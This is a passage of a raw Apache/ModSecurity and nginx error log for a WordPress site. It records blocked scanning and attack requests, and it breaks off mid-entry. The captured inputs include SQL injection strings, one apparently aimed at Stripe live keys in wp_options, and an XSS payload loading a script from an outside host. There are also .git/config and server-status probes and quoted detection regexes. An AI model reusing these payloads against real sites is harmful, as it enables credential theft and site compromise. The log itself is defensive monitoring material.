"/wp-includes/js/mediaelement/mediaelementplayer-legacy.min.css"] [unique_id "ZnyFu657xDCgKzJ-zxAxtwAAAEA"] [Wed Jun 26 16:18:52.427508 2024] [:error] [pid 31245:tid 140055407634176] [client 141.98.81.52:34528] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/mediaelement/mediaelementplayer-legacy.min.css"] [unique_id "ZnyFvK57xDCgKzJ-zxAxuAAAAEY"] [Wed Jun 26 16:18:53.492635 2024] [:error] [pid 31859:tid 140055242823424] [client 141.98.81.52:34530] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\b(?i:having)\\\\b\\\\s+(\\\\d{1,10}|'[^=]{1,10}')\\\\s*?[=<>]|(?i:\\\\bexecute(\\\\s{1,5}[\\\\w\\\\.$]{1,5}\\\\s{0,3})?\\\\()|\\\\bhaving\\\\b ?(?:\\\\d{1,10}|[\\\\'\\"][^=]{1,10}[\\\\'\\"]) ?[=<>]+|(?i:\\\\bcreate\\\\s+?table.{0,20}?\\\\()|(?i:\\\\blike\\\\W*?char\\\\W*?\\\\()|(?i:(?:(select(.* ..." at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "130"] [id "959070"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: ORDER BY found within ARGS:ver: 4.2.16 ORDER BY 1#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/mediaelement/mediaelementplayer-legacy.min.css"] [unique_id "ZnyFvYxkekPtrPbqLNY4hQAAANE"] [Wed Jun 26 16:18:53.742021 2024] [:error] [pid 31246:tid 140055432812288] [client 141.98.81.52:34532] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/mediaelement/mediaelementplayer-legacy.min.css"] [unique_id "ZnyFvVxchXPGtOGw21Gp_QAAAIM"] [Wed Jun 26 16:18:54.003241 2024] [:error] [pid 31859:tid 140055457990400] [client 141.98.81.52:34534] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/mediaelement/mediaelementplayer-legacy.min.css"] [unique_id "ZnyFvoxkekPtrPbqLNY4hgAAAMA"] [Wed Jun 26 16:18:54.254451 2024] [:error] [pid 31246:tid 140055457990400] [client 141.98.81.52:34536] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/mediaelement/mediaelementplayer-legacy.min.css"] [unique_id "ZnyFvlxchXPGtOGw21Gp_gAAAIA"] [Wed Jun 26 16:18:54.497766 2024] [:error] [pid 31246:tid 140055276394240] [client 141.98.81.52:34538] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/mediaelement/mediaelementplayer-legacy.min.css"] [unique_id "ZnyFvlxchXPGtOGw21Gp_wAAAI0"] [Wed Jun 26 16:18:54.750082 2024] [:error] [pid 31244:tid 140055242823424] [client 141.98.81.52:34540] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/mediaelement/mediaelementplayer-legacy.min.css"] [unique_id "ZnyFvubXXCyFmkhe1iNqUgAAABE"] [Wed Jun 26 16:18:55.003160 2024] [:error] [pid 31245:tid 140055276394240] [client 141.98.81.52:34542] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/mediaelement/mediaelementplayer-legacy.min.css"] [unique_id "ZnyFv657xDCgKzJ-zxAxuQAAAE0"] [Wed Jun 26 16:18:55.254371 2024] [:error] [pid 31859:tid 140055276394240] [client 141.98.81.52:34544] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/mediaelement/mediaelementplayer-legacy.min.css"] [unique_id "ZnyFv4xkekPtrPbqLNY4hwAAAM0"] [Wed Jun 26 16:18:55.503831 2024] [:error] [pid 31859:tid 140055268001536] [client 141.98.81.52:34546] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/mediaelement/mediaelementplayer-legacy.min.css"] [unique_id "ZnyFv4xkekPtrPbqLNY4iAAAAM4"] [Wed Jun 26 16:18:55.757289 2024] [:error] [pid 31245:tid 140055441204992] [client 141.98.81.52:34548] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/mediaelement/mediaelementplayer-legacy.min.css"] [unique_id "ZnyFv657xDCgKzJ-zxAxugAAAEI"] [Wed Jun 26 16:18:56.000037 2024] [:error] [pid 31245:tid 140055293179648] [client 141.98.81.52:34550] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/mediaelement/mediaelementplayer-legacy.min.css"] [unique_id "ZnyFv657xDCgKzJ-zxAxuwAAAEs"] [Thu Jun 27 11:46:11.428729 2024] [:error] [pid 17170:tid 140652411033344] [client 179.43.191.18:57952] [client 179.43.191.18] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(<script[^>]*>[\\\\s\\\\S]*?<\\\\/script[^>]*>|<script[^>]*>[\\\\s\\\\S]*?<\\\\/script[[\\\\s\\\\S]]*[\\\\s\\\\S]|<script[^>]*>[\\\\s\\\\S]*?<\\\\/script[\\\\s]*[\\\\s]|<script[^>]*>[\\\\s\\\\S]*?<\\\\/script|<script[^>]*>[\\\\s\\\\S]*?)" at ARGS:result[_msg]. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_xss_attacks.conf"] [line "14"] [id "973336"] [rev "1"] [msg "XSS Filter - Category 1: Script Tag Vector"] [data "Matched Data: <script src=https://zeroday2024.com/admin-bar-reloaded.min.js></script> found within ARGS:result[_msg]: <script src=https://zeroday2024.com/admin-bar-reloaded.min.js></script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "1"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "investigacionperu.com"] [uri "/wp-json/litespeed/v1/cdn_status"] [unique_id "Zn2XU41TtXPRnuMpHYbtTAAAAJI"], referer: https://investigacionperu.com [Thu Jun 27 15:18:58.211749 2024] [:error] [pid 17410:tid 140652494960384] [client 179.43.191.18:33428] [client 179.43.191.18] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(<script[^>]*>[\\\\s\\\\S]*?<\\\\/script[^>]*>|<script[^>]*>[\\\\s\\\\S]*?<\\\\/script[[\\\\s\\\\S]]*[\\\\s\\\\S]|<script[^>]*>[\\\\s\\\\S]*?<\\\\/script[\\\\s]*[\\\\s]|<script[^>]*>[\\\\s\\\\S]*?<\\\\/script|<script[^>]*>[\\\\s\\\\S]*?)" at ARGS:result[_msg]. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_xss_attacks.conf"] [line "14"] [id "973336"] [rev "1"] [msg "XSS Filter - Category 1: Script Tag Vector"] [data "Matched Data: <script src=https://zeroday2024.com/admin-bar-reloaded.min.js></script> found within ARGS:result[_msg]: <script src=https://zeroday2024.com/admin-bar-reloaded.min.js></script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "1"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "investigacionperu.com"] [uri "/wp-json/litespeed/v1/cdn_status"] [unique_id "Zn3JMhun2gAqcfFdsQIJQAAAAMg"], referer: http://investigacionperu.com [Thu Jun 27 17:53:55.835990 2024] [autoindex:error] [pid 8586:tid 140652511745792] [client 20.171.43.52:37058] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Thu Jun 27 20:12:38.107958 2024] [autoindex:error] [pid 8683:tid 140652469782272] [client 128.199.193.45:38696] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Fri Jun 28 03:24:50.347849 2024] [authz_core:error] [pid 17169:tid 140652419426048] [client 167.172.232.142:45522] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2024/06/28 03:24:53 [error] 17135#17135: *53316 access forbidden by rule, client: 167.172.232.142, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "www.investigacionperu.com" [Fri Jun 28 12:21:25.438202 2024] [authz_core:error] [pid 5506:tid 140145330099968] [client 68.183.9.16:54900] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2024/06/28 12:21:29 [error] 5464#5464: *58936 access forbidden by rule, client: 68.183.9.16, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" [Fri Jun 28 13:25:50.216962 2024] [authz_core:error] [pid 5611:tid 140145193879296] [client 142.93.0.66:56148] AH01630: client denied by server configuration: /home/investig/public_html/server-status [Fri Jun 28 13:25:51.031011 2024] [authz_core:error] [pid 5611:tid 140145244235520] [client 64.226.65.160:56154] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2024/06/28 13:25:55 [error] 5464#5464: *59712 access forbidden by rule, client: 142.93.0.66, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" 2024/06/28 13:25:56 [error] 5465#5465: *59721 access forbidden by rule, client: 64.226.65.160, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "www.investigacionperu.com" [Sun Jun 30 00:31:12.843937 2024] [authz_core:error] [pid 21832:tid 139626761086720] [client 164.92.244.132:59640] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2024/06/30 00:31:16 [error] 21810#21810: *79943 access forbidden by rule, client: 164.92.244.132, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" 2024/06/30 00:43:56 [error] 21810#21810: *80369 access forbidden by rule, client: 46.101.111.185, server: webmail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "webmail.investigacionperu.com" 2024/06/30 00:43:57 [error] 21810#21810: *80375 access forbidden by rule, client: 207.154.212.47, server: mail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2024/06/30 00:43:57 [error] 21810#21810: *80423 access forbidden by rule, client: 138.68.82.23, server: cpanel.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "cpanel.investigacionperu.com" 2024/06/30 00:43:59 [error] 21811#21811: *80505 access forbidden by rule, client: 46.101.111.185, server: webmail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "webmail.investigacionperu.com" 2024/06/30 00:43:59 [error] 21810#21810: *80507 access forbidden by rule, client: 139.59.136.184, server: mail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2024/06/30 00:44:00 [error] 21811#21811: *80515 access forbidden by rule, client: 207.154.212.47, server: cpanel.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "cpanel.investigacionperu.com" [Sun Jun 30 00:49:52.119762 2024] [authz_core:error] [pid 32232:tid 139627030542080] [client 157.245.204.205:33088] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2024/06/30 00:49:59 [error] 21810#21810: *80990 access forbidden by rule, client: 157.245.204.205, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "www.investigacionperu.com" [Sun Jun 30 03:41:20.077357 2024] [ssl:warn] [pid 1967:tid 140449565165440] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun Jun 30 03:41:28.295281 2024] [ssl:warn] [pid 1973:tid 140449565165440] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun Jun 30 03:41:28.756356 2024] [ssl:warn] [pid 1973:tid 140449565165440] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun Jun 30 03:41:31.267613 2024] [ssl:warn] [pid 1973:tid 140449565165440] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun Jun 30 03:41:33.533732 2024] [ssl:warn] [pid 2395:tid 140660511168384] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun Jun 30 03:41:41.750876 2024] [ssl:warn] [pid 2396:tid 140660511168384] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name 2024/06/30 06:24:19 [error] 2376#2376: *85724 access forbidden by rule, client: 109.202.99.36, server: mail.investigacionperu.com, request: "GET /.svn/wc.db HTTP/1.1", host: "mail.investigacionperu.com" 2024/06/30 06:24:19 [error] 2377#2377: *85728 access forbidden by rule, client: 109.202.99.36, server: mail.investigacionperu.com, request: "GET /.git/HEAD HTTP/1.1", host: "mail.investigacionperu.com" [Sun Jun 30 07:14:48.856072 2024] [authz_core:error] [pid 2419:tid 140660162123520] [client 172.105.16.105:41056] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2024/06/30 07:14:52 [error] 2377#2377: *86601 access forbidden by rule, client: 172.105.16.105, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "www.investigacionperu.com" [Sun Jun 30 07:14:53.085467 2024] [authz_core:error] [pid 2420:tid 140660094981888] [client 128.199.182.55:41078] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2024/06/30 07:14:57 [error] 2376#2376: *86620 access forbidden by rule, client: 128.199.182.55, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" [Mon Jul 01 00:42:47.681603 2024] [ssl:warn] [pid 2396:tid 140660511168384] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon Jul 01 03:49:22.219459 2024] [ssl:warn] [pid 25162:tid 140179367266176] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon Jul 01 03:49:30.466018 2024] [ssl:warn] [pid 25163:tid 140179367266176] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon Jul 01 03:49:31.125049 2024] [ssl:warn] [pid 25163:tid 140179367266176] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon Jul 01 03:49:33.386037 2024] [ssl:warn] [pid 25163:tid 140179367266176] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon Jul 01 03:49:35.632868 2024] [ssl:warn] [pid 25578:tid 140262621538176] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon Jul 01 03:49:43.826901 2024] [ssl:warn] [pid 25583:tid 140262621538176] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon Jul 01 03:49:44.119070 2024] [ssl:warn] [pid 25583:tid 140262621538176] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon Jul 01 22:12:09.602891 2024] [authz_core:error] [pid 25719:tid 140262231705344] [client 142.93.0.66:59396] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2024/07/01 22:12:12 [error] 25697#25697: *95882 access forbidden by rule, client: 142.93.0.66, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" [Tue Jul 02 00:48:26.390136 2024] [authz_core:error] [pid 25719:tid 140262265276160] [client 146.190.103.103:33292] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2024/07/02 00:48:32 [error] 25698#25698: *97018 access forbidden by rule, client: 146.190.103.103, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "www.investigacionperu.com" [Tue Jul 02 01:51:20.271390 2024] [authz_core:error] [pid 25718:tid 140262256883456] [client 64.226.78.121:34066] AH01630: client denied by server configuration: /home/investig/public_html/server-status [Tue Jul 02 01:51:23.529943 2024] [authz_core:error] [pid 25717:tid 140262164563712] [client 159.89.174.87:34078] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2024/07/02 01:51:24 [error] 25698#25698: *97615 access forbidden by rule, client: 64.226.78.121, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" 2024/07/02 01:51:28 [error] 25698#25698: *97630 access forbidden by rule, client: 159.89.174.87, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "www.investigacionperu.com" [Tue Jul 02 02:35:48.656095 2024] [:error] [pid 26584:tid 140262181349120] [client 176.105.233.31:35762] [client 176.105.233.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(union(.*?)select(.*?)from)))" at ARGS:calculate_attribute_counts[][taxonomy]. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "225"] [id "981276"] [msg "Looking for basic sql injection. Common attack string for mysql, oracle and others."] [data "Matched Data: union%20all%20select%201%2Coption_value%20from found within ARGS:calculate_attribute_counts[][taxonomy]: %22%29%20union%20all%20select%201%2Coption_value%20from%20wp_options%20where%20option_value%20like%20%27%25pk_live%25%27%3B%00"] [severity "CRITICAL"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "investigacionperu.com"] [uri "/wp-json/wc/store/products/collection-data"] [unique_id "ZoOt1DMNghFxdEGHmB2TeAAAANY"] [Tue Jul 02 03:33:29.033475 2024] [ssl:warn] [pid 16781:tid 140622307362688] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Jul 02 03:33:37.349223 2024] [ssl:warn] [pid 16783:tid 140622307362688] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Jul 02 03:33:37.988560 2024] [ssl:warn] [pid 16783:tid 140622307362688] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Jul 02 03:33:40.164528 2024] [ssl:warn] [pid 16783:tid 140622307362688] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Jul 02 03:33:42.383835 2024] [ssl:warn] [pid 17201:tid 140015018293120] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Jul 02 03:33:50.595743 2024] [ssl:warn] [pid 17207:tid 140015018293120] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name 2024/07/02 10:38:49 [error] 17086#17086: *101716 access forbidden by rule, client: 13.38.92.103, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" [Tue Jul 02 11:26:54.402683 2024] [autoindex:error] [pid 17227:tid 140014700709632] [client 188.166.213.27:43080] AH01276: Cannot serve directory /home/investig/public_html/wp-content/uploads/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive 2024/07/03 01:33:37 [error] 17086#17086: *109756 access forbidden by rule, client: 179.43.188.122, server: mail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "mail.investigacionperu.com" [Wed Jul 03 03:32:32.848852 2024] [ssl:warn] [pid 1743:tid 140331926935424] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed Jul 03 03:32:41.070299 2024] [ssl:warn] [pid 1744:tid 140331926935424] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed Jul 03 03:32:41.478261 2024] [ssl:warn] [pid 1744:tid 140331926935424] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed Jul 03 03:32:43.210415 2024] [ssl:warn] [pid 1744:tid 140331926935424] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed Jul 03 03:32:45.561122 2024] [ssl:warn] [pid 2160:tid 140082869897088] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed Jul 03 03:32:57.791035 2024] [ssl:warn] [pid 2165:tid 140082869897088] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed Jul 03 08:49:16.582329 2024] [autoindex:error] [pid 2806:tid 140082547771136] [client 4.242.216.5:33170] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Wed Jul 03 13:31:30.988580 2024] [:error] [pid 2806:tid 140082463844096] [client 84.239.43.183:38106] [client 84.239.43.183] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:c(?:o(?:n(?:t(?:entsmartz|actbot/)|cealed defense|veracrawler)|mpatible(?: ;(?: msie|\\\\.)|-)|py(?:rightcheck|guard)|re-project/1.0)|h(?:ina(?: local browse 2\\\\.|claw)|e(?:rrypicker|esebot))|rescent internet toolpak)|w(?:e(?:b(?: (?:downloader|by ..." at REQUEST_HEADERS:User-Agent. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_35_bad_robots.conf"] [line "27"] [id "990012"] [rev "2"] [msg "Rogue web site crawler"] [data "panscient.com"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/AUTOMATION/MALICIOUS"] [tag "WASCTC/WASC-21"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.investigacionperu.com"] [uri "/robots.txt"] [unique_id "ZoWZAs4xnUT0_h2DoW24hAAAANI"] [Wed Jul 03 13:31:32.047742 2024] [:error] [pid 2182:tid 140082489022208] [client 84.239.43.183:38108] [client 84.239.43.183] ModSecurity: Access denied with code 403 (phase 2). Pattern match 